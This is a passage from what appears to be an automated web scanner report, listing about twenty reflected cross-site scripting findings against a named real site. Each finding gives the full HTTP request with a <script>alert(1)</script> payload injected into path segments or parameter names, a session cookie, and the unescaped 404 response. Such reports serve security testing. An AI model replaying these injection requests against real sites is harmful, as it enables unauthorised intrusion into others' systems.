<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/imagesc85d5<script>alert(1)</script>50df8ab74ec/rating/ was not found on this server.</p>
...[SNIP]...

2.3770. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2d260<script>alert(1)</script>1c8d1dcfd24 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/rating2d260<script>alert(1)</script>1c8d1dcfd24/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating2d260<script>alert(1)</script>1c8d1dcfd24/ was not found on this server.</p>
...[SNIP]...

2.3771. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 776e9<script>alert(1)</script>572cc55018e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/rating/?776e9<script>alert(1)</script>572cc55018e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating/?776e9<script>alert(1)</script>572cc55018e=1 was not found on this server.</p>
...[SNIP]...

2.3772. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/3.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17d8e<script>alert(1)</script>a359f00de4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail17d8e<script>alert(1)</script>a359f00de4/9/themes/kosmos/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail17d8e<script>alert(1)</script>a359f00de4/9/themes/kosmos/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.3773. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/3.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bf890<script>alert(1)</script>5838ffdac10 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9bf890<script>alert(1)</script>5838ffdac10/themes/kosmos/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9bf890<script>alert(1)</script>5838ffdac10/themes/kosmos/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.3774. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/3.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb9bb<script>alert(1)</script>9f8d37465ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themesbb9bb<script>alert(1)</script>9f8d37465ca/kosmos/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themesbb9bb<script>alert(1)</script>9f8d37465ca/kosmos/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.3775. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/3.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bf93d<script>alert(1)</script>1e0ba2afaa2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmosbf93d<script>alert(1)</script>1e0ba2afaa2/images/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmosbf93d<script>alert(1)</script>1e0ba2afaa2/images/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.3776. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/3.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 276d0<script>alert(1)</script>82d936d03 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images276d0<script>alert(1)</script>82d936d03/rating/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images276d0<script>alert(1)</script>82d936d03/rating/3.gif was not found on this server.</p>
...[SNIP]...

2.3777. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/3.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 660f7<script>alert(1)</script>d0e3ce9e123 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/rating660f7<script>alert(1)</script>d0e3ce9e123/3.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating660f7<script>alert(1)</script>d0e3ce9e123/3.gif was not found on this server.</p>
...[SNIP]...

2.3778. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/3.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/3.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload e1d6c<script>alert(1)</script>7ae9a00f1c9 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/rating/3.gife1d6c<script>alert(1)</script>7ae9a00f1c9 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:38:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating/3.gife1d6c<script>alert(1)</script>7ae9a00f1c9 was not found on this server.</p>
...[SNIP]...

2.3779. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/3.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/3.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f07cc<script>alert(1)</script>732e8e2f11c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/rating/3.gif?f07cc<script>alert(1)</script>732e8e2f11c=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating/3.gif?f07cc<script>alert(1)</script>732e8e2f11c=1 was not found on this server.</p>
...[SNIP]...

2.3780. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 97534<script>alert(1)</script>209ba810dd4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail97534<script>alert(1)</script>209ba810dd4/9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail97534<script>alert(1)</script>209ba810dd4/9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3781. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec282<script>alert(1)</script>6d9a0724c8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9ec282<script>alert(1)</script>6d9a0724c8a/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9ec282<script>alert(1)</script>6d9a0724c8a/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3782. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 54be1<script>alert(1)</script>7148cd6e897 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes54be1<script>alert(1)</script>7148cd6e897/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes54be1<script>alert(1)</script>7148cd6e897/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3783. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 87d06<script>alert(1)</script>9363e776b16 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos87d06<script>alert(1)</script>9363e776b16/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos87d06<script>alert(1)</script>9363e776b16/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3784. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 58a92<script>alert(1)</script>b10d7c00487 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images58a92<script>alert(1)</script>b10d7c00487/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images58a92<script>alert(1)</script>b10d7c00487/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3785. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 343b2<script>alert(1)</script>35ec8cd0080 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/rating343b2<script>alert(1)</script>35ec8cd0080/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating343b2<script>alert(1)</script>35ec8cd0080/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3786. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d4ed5<script>alert(1)</script>956ca889fd7 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/9/themes/kosmos/images/rating/search.phpd4ed5<script>alert(1)</script>956ca889fd7?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating/search.phpd4ed5<script>alert(1)</script>956ca889fd7?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3787. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 79224<a>345f365a71b was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search79224<a>345f365a71b&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/9/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search79224<a>345f365a71b&opt=2 was not found on this server.</p>
...[SNIP]...

2.3788. http://www.resellerbase.com/detail/9/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/9/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a2b5b<a>fcea11e52d1 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

